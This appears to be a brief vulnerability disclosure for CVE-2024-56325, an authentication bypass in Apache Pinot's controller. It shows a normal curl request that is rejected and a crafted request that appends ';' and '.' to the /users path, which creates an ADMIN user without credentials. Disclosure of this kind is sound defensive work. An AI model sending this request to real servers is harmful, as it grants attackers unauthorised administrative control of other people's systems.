CVE-2024-56325

Authentication Bypass Issue<br /> <br /> If the path does not contain / and contain., authentication is not required.<br /> <br /> Expected Normal Request and Response Example<br /> <br /> curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users <br /> <br /> <br /> Return: {"code":401,"error":"HTTP 401 Unauthorized"}<br /> <br /> <br /> Malicious Request and Response Example <br /> <br /> curl -X POST -H "Content-Type: application/json" -d &amp;#39;{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}&amp;#39; http://{serverip}:9000/users; http://{serverip}:9000/users; .<br /> <br /> <br /> Return: {"users":{}}<br /> <br /> <br /> <br /> <br /> <br /> A new user gets added bypassing authentication, enabling the user to control Pinot.